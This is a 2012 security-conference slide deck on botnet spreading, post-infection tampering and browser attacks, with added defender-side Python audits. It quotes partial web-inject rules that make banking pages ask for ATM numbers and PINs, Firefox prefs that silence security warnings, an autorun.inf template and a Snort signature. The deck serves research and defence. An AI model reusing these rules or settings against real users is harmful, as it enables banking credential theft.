Botnets Die Hard - Owned and Operated
Las Vegas, 2012
Aditya K Sood | Richard J Enbody
SecNiche Security | Department of Computer Science and Engineering, Michigan State University

About Us
■ Aditya K Sood
  • PhD Candidate at Michigan State University
    - Working with iSEC Partners
    - Founder, SecNiche Security Labs
    - Worked previously for Armorize, Coseinc and KPMG
    - Active speaker at security conferences
    - LinkedIn: http://www.linkedin.com/in/adityaks
    - Website: http://www.secniche.org | Blog: http://secniche.blogspot.com
    - Twitter: @AdityaKSood
■ Dr. Richard J Enbody
  • Associate Professor, CSE, Michigan State University
    - Since 1987, teaching computer architecture / computer security / mathematics
    - Co-author of the CS1 Python book, The Practice of Computing Using Python
    - Patents pending: hardware buffer overflow protection

Disclaimer
■ This research relates to my own efforts and does not provide the view of any of my present and previous employers.
Agenda
■ Bot Spreading Mechanisms
  - Browser Exploit Packs
  - Drive-by-Download frameworks
  - Spreaders
  - Demonstration
■ POST Exploitation
  - Understanding Ruskill
  - DNS Changer in Action
  - Other System Manipulation Tactics
  - Demonstration
■ Exploiting Browsers/HTTP
  - Man in the Browser
  - Formgrabbing
  - Web Injects
  - Demonstration
■ Conclusion

Rise of Third Generation Botnets (TGB)
TGB infections started with Zeus

Bot Spreading Mechanisms
Widely Deployed

Browser Exploit Packs
■ Browser Exploit Packs (BEPs)
— Overview
  • Automated frameworks containing browser exploits
  • Implement the concept of drive-by-download attacks
  • Exploits are bundled as unique modules
  • Mostly written in PHP + MySQL
    - PHP code is obfuscated with the ionCube encoder
  • Capture statistics about the infected machines
  • Widely used BEPs are BlackHole / Nuclear / Phoenix etc.
— How is the exploit served?
  • Fingerprinting the browser's environment
    - User-Agent string parameters
    - Plugin detection module: Java / PDF / Flash
    - Custom JavaScript for extracting information from the infected machine

Browser Exploit Packs
— Obfuscated JavaScript used in BlackHole infections
  • Hiding the infected domain
— PDF plugin detection

Demonstration

Drive-by-Download Attacks
— Drive-by-Download
  • Victim's browser is forced to visit the infected website
  • IFrame redirects the browser to the BEP
  • Exploit is served by fingerprinting the browser environment
  • Browser is exploited successfully using JavaScript heap spraying
  • BEP silently downloads the malware onto the victim machine

Drive-by-Download Frameworks
— Java Drive-by Generator
[Screenshot: Java Drive-by Generator builder interface, offering HTML-based and JAR-based drive-by methods, a template selector, drop name and drop location, program URL, admin control panel URL, encryption level (beta), redirect options and custom publisher fields]

Demonstration

Spreaders
■ USB Spreading (Upas Bot - Case Study)
— Inside the USB spreader
  - Widely used technique in bot design for infecting USB devices
— Win32 implementation
  • Bot calls the RegisterDeviceNotificationW function
    » It can also be implemented as a Windows service
[Disassembly screenshot: the bot zeroes a NotificationFilter structure, converts the string "{a5dcbf10-6530-11d2-901f-00c04fb951ed}" with CLSIDFromString, and passes NotificationFilter and hRecipient to RegisterDeviceNotificationW. Annotation: GUID for Raw USB]

Spreaders
■ USB Spreading (Upas Bot - Case Study)
— Plug and Play (PnP) devices have a unique set of different GUIDs
  - Device interface GUID
    » Required for dbcc_classguid in DEV_BROADCAST_DEVICEINTERFACE
  - Device class GUID
    » Defines a wide range of devices
  • Defines WindowProc as follows
    » WM_DEVICECHANGE notification message in DEV_BROADCAST_HDR
    » dbch_devicetype → DBT_DEVTYP_DEVICEINTERFACE
  • Waits for the USB device and triggers on the device-change event as follows:
    - wParam in WindowProc
      » DBT_DEVICEARRIVAL | DBT_DEVICEREMOVECOMPLETE
    - Fetches the drive letter of the USB device as follows
      » dbcv_unitmask in _DEV_BROADCAST_VOLUME | Logical drive information
  • Continued

Spreaders
■ USB Spreading (Upas Bot - Case Study)
— On successfully detecting the USB device, the bot executes functions as follows:
  - CopyFileW to copy the malicious executable to the USB drive
  - CreateFileW to create an autorun.inf file in the USB root directory
  - SetFileAttributesW to apply the required file attributes
[Disassembly screenshot: the file name is built from the format string "%ws%ws_a.exe", then CopyFileW is called, followed by SetFileAttributesW with dwFileAttributes 6]
[Disassembly screenshot, "Autorun.inf infection": format strings "%wsautorun.inf" and "[autorun]\r\nopen=%ws_a.exe\r\n", followed by CreateFileW with dwDesiredAccess 0C0000000h, dwCreationDisposition 2 and dwFlagsAndAttributes 80h]

Spreaders
■ USB Spreading (Upas Bot - Case Study)
— Infecting USB devices using malicious .LNK files
[Disassembly screenshot, ".LNK infection": format strings "%ws%ws", "%ws%ws.lnk", ".lnk" and "%ws*"; calls to FindFirstFileW, wcsstr, SetFileAttributesW and SHGetFileInfoW; a shortcut command template beginning /C start "" (remainder illegible)]

Spreaders
■ USB Spreading (Upas Bot - Case Study)
— Upas in action
[Disassembly screenshot: format strings "%c:\\", "data=USB<|>Infected Drive %c:\\<||>\r\n", "1.0.0.0" and "?act=spreading&ver=%s"]
[Screenshot: C&C log listing repeated "Infected Drive" entries for drives E:\\, F:\\, G:\\ and H:\\]

Spreaders
■ Upas Bot Network Behavior Detection
— Writing a signature specific to USB infection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Win32.UPas - Runtime Detection"; flow:to_server,established; content:"POST "; depth:5; uricontent:"?act=spreading&ver="; nocase; content:"|0D 0A 0D 0A|data=USB|3C 7C 3E|Infected Drive"; nocase; classtype:Worm; reference:SNS; sid:110034567; rev:1;)

POST Exploitation
Subverting System Integrity

Understanding Ruskill
■ What is Ruskill?
— A term coined in Russia
  • It refers to the group of warriors who demonstrate their skill in battle
  • Typically used by Diablo game players to demonstrate their strength and power
— How does Ruskill relate to bots?
  • Ruskill module is used to demonstrate the capability of bots
  • Removing traces of malware in the system after successful reboot

Understanding Ruskill
■ Inside Ruskill Module
— Found in NGR (Dorkbot)
— Remote file downloading and execution
  • Ruskill allows the bot to fetch any executable from a third-party resource and execute it on the compromised system
— Restoring System
  • Ruskill monitors all the changes performed by the malicious executable in the system
  • Ruskill restores the registry, files and network settings to the same state (before the execution of the malicious binary) after reboot
  • Deletes the malicious executable after successful execution in the system

Understanding Ruskill
■ Inside Ruskill Module
[Disassembly screenshot, "Ruskill Detecting File, DNS and Registry modifications": three logging calls with the format strings "[Ruskill]: Detected file: \"%s\"", "[Ruskill]: Detected DNS: \"%s\"" and "[Ruskill]: Detected Reg: \"%s\""]

Demonstration

Critical Problem - DNS Changer
[Collage of news headlines:]
  - DNSChanger apocalypse: DNSChanger cutoff is more whimper than bang. Score one for the good guys. Cutting off Internet access to computers infected with the nasty DNSChanger trojan did not bring about doomsday after all. Why, beyond the obvious, that's good news in the cybersecurity world.
  - DNSChanger Doomsday: The FBI is pulling the plug on rogue DNS servers on Monday, meaning those who haven't cleaned up their computers could be stranded without Internet. Which begs the question, should they even be allowed Internet access?
  - Don't forget: DNSChanger malware could kill your internet on Monday
  - Facebook warns users of the end of the Internet via DNSChanger
  - Internet blackout looms for 300K DNSChanger-infected computers
  - FBI Limits DNSChanger Malware Damage; No 'Internet Doomsday'
  - The FBI shut down servers that allowed more than 4 million virus-infected computers to access internet
  - DNSChanger Shutdown, Despite Laggards, Is a Good Thing
  - DNSChanger operation shuts down, leaving some without access to web

DNS Changer in Action
■ DNS Changer
— Exploiting the DNS resolution functionality of the infected machine
— What is it used for?
  • Blocking security providers' websites (implementing blacklists)
    - Blocking the microsoft.com updates website to restrict the downloading of updates
    - Restricting the opening of anti-virus vendors' websites
  • Redirecting the browser to the malicious domain
    - Forcing the infected machine to download updates from the malicious domain
    - Triggering chain infection for downloading another set of malware onto the infected system

DNS Changer in Action
■ DNS Changer
— How this works?
  • Replacing the DNS server entries in the infected machine with IP addresses of the malicious DNS server
  • Adding rogue entries in the hosts configuration file
  • Executing DNS amplification attack by subverting the integrity of LAN devices such as routers and gateways
    - It results in DNS hijacking at a large scale in the network
  • Hooking DNS libraries
    - The preferred method is inline hooking, in which detour and trampoline functions are created to play with DNS-specific DLLs.
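A defender-side check for the first two tampering methods listed above (replaced DNS server entries and rogue hosts entries), as an added example that is not part of the original slides. The watched domain suffixes, the approved resolver range and the sample data are assumptions constructed for illustration.

```python
import ipaddress

# Assumption: suffixes to watch; replace with the update and anti-virus
# vendor domains relevant to your environment.
WATCHED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "av-vendor.example")


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for each mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue                      # blank, comment-only or incomplete line
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                      # first field is not an IP address
        for name in fields[1:]:
            yield line_no, ip, name.lower().rstrip(".")


def is_watched(hostname):
    """True for a watched suffix itself or any subdomain of it."""
    return any(hostname == s or hostname.endswith("." + s) for s in WATCHED_SUFFIXES)


def audit_hosts(text):
    """Flag hosts entries that block or redirect a watched domain."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if is_watched(name):
            # Loopback/unspecified addresses make the name unreachable (blacklist);
            # any other address silently sends the client somewhere else.
            kind = "blocked" if ip.is_loopback or ip.is_unspecified else "redirected"
            findings.append((line_no, kind, name, str(ip)))
    return findings


def audit_resolvers(configured, approved_networks):
    """Return configured DNS servers that fall outside the approved networks."""
    nets = [ipaddress.ip_network(n) for n in approved_networks]
    rogue = []
    for server in configured:
        addr = ipaddress.ip_address(server)
        if not any(addr.version == n.version and addr in n for n in nets):
            rogue.append(server)
    return rogue


# Constructed sample data (documentation address ranges, not real indicators).
SAMPLE_HOSTS = """\
127.0.0.1    localhost
127.0.0.1    update.microsoft.com     # blacklist-style entry
203.0.113.7  www.av-vendor.example    # redirect-style entry
192.0.2.10   intranet.corp.example
"""
SAMPLE_RESOLVERS = ["10.0.0.53", "198.51.100.23"]
APPROVED_NETWORKS = ["10.0.0.0/8"]

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print("hosts line %d: %s %s -> %s" % finding)
    for server in audit_resolvers(SAMPLE_RESOLVERS, APPROVED_NETWORKS):
        print("unapproved DNS server:", server)
```

On Windows the hosts file to feed in is %SystemRoot%\System32\drivers\etc\hosts; the resolver list has to be collected from the adapter configuration of the machine under review.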
DNS Changer in Action
■ DNS Changer
— Inside DNS hooking
  • Hooking the DNS API
    - Hooking DnsQuery (*) function calls in dnsapi.lib/dnsapi.dll
    - Implemented by creating a blacklist
    - Bot hijacks the DNS resolution flow by filtering all the incoming DNS requests
  • Hooking the DNS Cache Resolver Service
    - The cache resolver service is used for DNS caching
    - Bot hooks the sendto function in ws2_32.dll to verify the origin of the DNS query, validating whether sendto is called by dnsrslvr.dll

DNS Changer in Action
■ DNS Changer
— Implementation in NGR bot
[Disassembly screenshot: strings "bdns", "[DNS]: Blocked %d domain(s) - Redirecte…" and "[DNS]: Redirecting \"%s\" to \"%s\"…"; sub_40A970 resolves "DnsFlushResolverCache" from "dnsapi.dll"]

Demonstration

Certificate Deletion
■ Certificate Deletion
— Removing all instances of private certificates from the infected machine
[Disassembly screenshot, "ICE IX bot - certificate deletion module": sub_4141F4 opens the "MY" system store with CertOpenSystemStoreW, walks it with CertEnumCertificatesInStore, duplicates each context with CertDuplicateCertificateContext, deletes it with CertDeleteCertificateFromStore, and finally calls CertCloseStore]

Cryptovirology in Action
■ Cryptovirology
— Exploiting the built-in Windows Crypto APIs
— Cryptovirology allows malware authors to build robust malware
— How is cryptovirology used in designing bots?
  • Generating random filenames for bots
  • Creating registry entries with random keys
  • Highly used for generating random DNS server entries
    - All DNS entries map to the same IP address
  • Of course, encrypted communication between infected machine and C&C server
  • Verifying the integrity of malicious files downloaded in the system
    - Scrutinizing the bots

Cryptovirology in Action
■ Cryptovirology
— An instance from ICE IX bot - Windows Crypto API misuse
[Disassembly screenshot: CryptAcquireContextW (dwFlags 0F0000040h, dwProvType 1); CryptCreateHash (Algid 8003h), annotated "Initiate the hashing of a stream of data"; CryptHashData, annotated "Compute the cryptographic hash on a stream of data"; CryptGetHashParam (dwParam 2) with a check that the returned length is 10h; CryptDestroyHash]

Exploiting Browsers
Data Exfiltration Over HTTP

Downgrading Browser Security
■ Removing Protections
— Nullifying browser client-side security to perform stealthy operations
— Internet Explorer
  • Tampering zone values in the registry
    - \Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
— Firefox
  • Manipulating entries in the user.js file
    - user_pref("security.warn_submit_insecure", false);
      » Browser does not raise an alert box when information is sent over HTTP while submitting forms.
    - user_pref("security.warn_viewing_mixed", false);
      » Removes the warning about mixed content over SSL.
Old-school trick, but it works very effectively. Several other techniques of subverting browser security also exist.

Man-in-the-Browser (MitB)
■ Inside MitB
— MitB typically refers to a userland rootkit that exploits the browser integrity
[Diagram: the user opens a web page to initiate a session and make online transactions; web page data in the form of an HTTP request is hooked by the MitB agent; the page is tampered with, and the altered POST data is sent back to the web server for performing the final operation]

What Lies Beneath?
[Screenshot: Chase Online "My Accounts" page in Internet Explorer with an injected form stating that additional information is occasionally needed for extra security, and asking for Social Security number, driver's license, date of birth, ATM card number, card expiration date and PIN code (with confirmation)]
Note: The popup is triggered in the user's active session.
So what is it actually? No doubt it is a popup, but the technique is termed Web Injects, not phishing or something like that.
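An audit for the Firefox user.js tampering described on the Downgrading Browser Security slide above, added here and not taken from the slides. Only the two watched preference names come from the slide; the sample file, the approved list and the generic rule for other security.* preferences are assumptions.

```python
import re

# The two preferences named on the slide; a value of false silences the warning.
WATCHED = {
    "security.warn_submit_insecure": "no alert when a form is submitted over HTTP",
    "security.warn_viewing_mixed": "no warning for mixed content on an SSL page",
}
# One user_pref("name", value); statement per line; '//' lines never match.
PREF = re.compile(r'^\s*user_pref\(\s*"([^"]+)"\s*,\s*(.+?)\s*\)\s*;', re.M)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def parse_prefs(text):
    """Return {name: value} from user.js/prefs.js text; the last assignment wins."""
    prefs = {}
    for name, raw in PREF.findall(BLOCK_COMMENT.sub("", text)):
        if raw in ("true", "false"):
            prefs[name] = raw == "true"
        elif re.fullmatch(r"-?\d+", raw):
            prefs[name] = int(raw)
        else:
            prefs[name] = raw.strip('"')
    return prefs


def audit_user_js(text, approved=()):
    """List (name, value, reason) for security preferences that need review."""
    findings = []
    for name, value in parse_prefs(text).items():
        if name in WATCHED:
            if value is False:
                findings.append((name, value, WATCHED[name]))
        elif name.startswith("security.") and name not in approved:
            # Assumption: any other security.* override should come from policy.
            findings.append((name, value, "security pref overridden outside policy"))
    return findings


# Constructed sample of a tampered user.js (preference names on the last
# three statements are placeholders, not real Firefox settings).
SAMPLE_USER_JS = """\
// constructed sample
user_pref("security.warn_submit_insecure", false);
user_pref("security.warn_viewing_mixed", false);
// user_pref("security.example_commented", false);
/* user_pref("security.example_block_commented", false); */
user_pref("browser.startup.homepage", "https://intranet.example/");
user_pref("security.example_policy_pref", 1);
"""

if __name__ == "__main__":
    for name, value, reason in audit_user_js(SAMPLE_USER_JS):
        print("%s = %r: %s" % (name, value, reason))
```

Firefox does not create user.js on its own, so the mere presence of the file in a profile that is not centrally managed is worth noting alongside these findings.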
Web Injects
■ Web Injects
— Based on the concept of hooking specific functions in the browser DLLs
— On-the-fly infection tactic
— Execution flow
  • Bot injects malicious content in the incoming HTTP responses
  • Injections are based on the static file named webinjects.txt
  • Rules are statically defined by the botmaster
  • Bot fetches rules from the webinjects.txt file and injects them in the live webpages
— Information stealing in a forceful manner
  • Exploits user ignorance

[Rule screenshot, partly illegible:]
set_url https://engine.paymentgate.ru/[illegible]/BPC/index.jsp GP
data_before
<input class="text" type="text" name="[illegible]" value="">
data_end
data_inject
[illegible]
data_end

Web Injects
[Rule screenshot, "Grabbing Account Type", partly illegible:]
set_url https://onlineeast*.bankofamerica.com/[illegible] GPH
data_before
<div class="primaryNav[illegible]">
data_end

■ What is meant by GPH flags?
— Exploitation and infection metrics
  • G - injection will be made only for the resources that are requested by GET
  • P - injection will be made only for the resources that are requested by POST
  • L - is a flag for grabbing content between the tags data_before and data_after inclusive
  • H - similar to L except the ripped content is not included and the contents of tags data_before and data_after

Web Injects - Real Time Cases (1)
set_url https://web.da-us.citibank.com/cgi-bin/citifi/portal/1/1.do GP
data_before
src="/cm/js/branding.js"></script>
data_end
data_inject
data_end
data_after
data_end
Forceful cookie injection in Citibank's website to manipulate the user's session

Web Injects - Real Time Cases (2)
set_url *bankofamerica.com* GP
data_before
View your SiteKey [illegible]</a>
data_end
data_inject
</TD>
</TR>
<TR>
<TD align=left class=textbold valign=top>
<label for="passcode"><SPAN class="text2">ATM Number:</SPAN> [illegible]
Enter an ATM Number. Your ATM Number must be 16 digits.
<input type="password" name="ATMNR" id="ATMNR" class="text1" value="" maxlength="16" size="[illegible]">
data_end
data_after
data_end
Injecting HTML content in Bank of America's webpages to steal the ATM number and the passcode.

set_url https://online.wellsfargo.com/signon* GP
data_before
data_end
data_inject
[illegible] ATM PIN</label><br/> [illegible] maxlength="14" title="Enter ATM PIN" [illegible] accesskey="A" />
&nbsp;
data_end
data_after
data_end
Injecting HTML content in Wells Fargo bank to steal the user's ATM code.

Form Grabbing
■ Form Grabbing
— It is an advanced technique of capturing information present in forms
[Diagram: the bank's web server serves the login page for account access; the user fills the form with username/password and submits it for verification; the browser sends the login credentials to the web server controlled by the bank domain; the malicious bot residing in the victim machine hooks the browser and reads the POST request; the bot extracts the information, i.e. the complete POST request, and sends it to the attacker's Command & Control (C&C) server; the bot releases the hook after sending the information]

Form Grabbing
■ Why Form Grabbing?
— Keylogging produces plethora of data
— Form grabbing - extracting data from the GET/POST requests
— Based on the concept of hooking and DLL injection
— No real protection against malware
[Screenshot: E*TRADE secure log-on and Bank of America online banking login forms]

Demonstration

This Data is Not Yours!
[Screenshot: credentials captured from Mozilla Firefox and Opera sessions, logged as URL, username and password]
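For incident response, a captured webinjects.txt can be parsed to list which URLs a bot targets and which form fields its injections ask for. This added example (not code from the slides or from any bot) follows the set_url / data_before / data_inject / data_after / data_end layout and the G and P flags described in the Web Injects slides above; treating * as the only wildcard, and the sample rules on example domains, are assumptions.

```python
import re
from dataclasses import dataclass, field

SECTIONS = ("data_before", "data_inject", "data_after")
INPUT_NAME = re.compile(r"<input\b[^>]*?\bname\s*=\s*[\"']?([\w.\-]+)", re.I)


@dataclass
class Rule:
    url_mask: str
    flags: str
    line_no: int
    blocks: list = field(default_factory=list)  # (section, body) in file order

    def applies_to(self, method, url):
        """G/P flags gate the HTTP method; '*' is the only mask wildcard (assumption)."""
        flag = {"GET": "G", "POST": "P"}.get(method.upper())
        pattern = ".*".join(re.escape(part) for part in self.url_mask.split("*"))
        return flag is not None and flag in self.flags and bool(re.fullmatch(pattern, url, re.S))

    def solicited_fields(self):
        """Names of the <input> elements this rule adds to the page."""
        return [n for s, body in self.blocks if s == "data_inject"
                for n in INPUT_NAME.findall(body)]


def parse_webinjects(text):
    """Return (rules, errors); errors are (line_no, message) for malformed input."""
    rules, errors, section, body = [], [], None, []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if section is not None:            # inside a block: collect until data_end
            if line == "data_end":
                rules[-1].blocks.append((section, "\n".join(body)))
                section = None
            else:
                body.append(raw)
        elif line.startswith("set_url "):
            parts = line.split()
            rules.append(Rule(parts[1], parts[2] if len(parts) > 2 else "", line_no))
        elif line in SECTIONS and rules:
            section, body = line, []
        elif line:
            errors.append((line_no, "unexpected text outside a block: %r" % line[:40]))
    if section is not None:                # truncated capture: report, do not guess
        errors.append((rules[-1].line_no, "%s not closed by data_end" % section))
    return rules, errors


# Constructed sample on example domains; the last block is deliberately truncated.
SAMPLE = """\
set_url https://online.bank.example/signon* GP
data_before
<label for="password">Password</label>
data_end
data_inject
<label>ATM PIN</label><input type="password" name="ATMPIN"><input name="CARDNR">
data_end
set_url *portal.example/accounts* GL
data_before
<div class="balance">
data_end
data_after
</div>
"""

if __name__ == "__main__":
    parsed, problems = parse_webinjects(SAMPLE)
    print([(r.url_mask, r.flags, r.solicited_fields()) for r in parsed], problems)
```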